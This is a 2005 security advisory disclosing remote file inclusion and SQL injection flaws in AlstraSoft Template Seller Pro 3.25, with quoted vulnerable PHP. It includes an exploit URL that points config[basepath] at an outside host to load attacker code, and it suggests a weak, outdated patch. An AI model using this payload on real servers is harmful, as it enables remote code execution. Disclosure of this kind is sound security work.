<<< Date Index >>>     <<< Thread Index >>>

Template Seller Pro 3.25



AlstraSoft Template Seller Pro 3.25 
===================================

   Software: AlstraSoft Template Seller Pro 3.25
   Severity: Arbitrary code execution, SQL Injection(s)
   Risk: High
   Author: Robin Verton <r.verton@xxxxxxxxx>
   Date: Nov. 15 2005
   Vendor: www.alstrasoft.com


   Description:

        Ever thought of starting your very own profitable shopping cart 
business just like TemplateMonster.com? 
        With AlstraSoft Template Seller Pro software, you can run your own 
templates store selling templates such 
        as website templates, logo templates, flash intro templates, frontpage 
templates and many more! The 
        flexibility of Template Seller Pro  software also allows you to run a 
membership based templates business 
        just like BoxedArt.com by offering paid members multiple templates 
download instantly.
        [http://www.alstrasoft.com/]


   Details:

        1) /include/paymentplugins/payment_paypal.php

           /**
           Paypal payment plugin
           */
          global $config,$conn;
          include("$config[basepath]/include/payment/class.paypal_ipn.php");
          include("$config[basepath]/include/paymentplugins/paymentplugin.php");

           
          If register_globals is set on, we can include and execute any php 
code of our choice. This is very dangerous
          because if safe_mode is off and there are no restriction for 
execution commands an attacker can get access
          to each file on the server.

          
http://www.example.com/include/paymentplugins/payment_paypal.php?config[basepath]=http://youhost.com/our-code.txt?

          Because of the trailing '?' we pass the 
'/include/payment/class.paypal_ipn.php' from the include statement as a 
parameter
          to the our-code.php script so only the script we set in 
$config[basepath] is included.

        2) /admin/index.php

          $sql_user_name = $user_name;
          $md5_pass = md5($user_pass);
                                                
          $sql = "SELECT * FROM UserDB WHERE user_name='$sql_user_name' and 
user_password='$md5_pass'";

          The User submitted variable for the username is inserted into the 
database without andy validation. Because of this
          we can insert malicious code into the database.

        Nearly NO user-submitted variable is validated , so there are a few 
more SQL-injections possible. 
 
           
           
   Patch:
          Insert constants and use the following code to prevent against such 
attacks

          if( !defined('IN_SYS') ) {
                die('Hacking Attempt!');
          }

          and activate magic_quotes_gpc
  
   Credits:

        Credit goes to Robin Verton

   References:

        [1] http://www.alstrasoft.com/template.htm
        [2] http://myblog.it-security23.net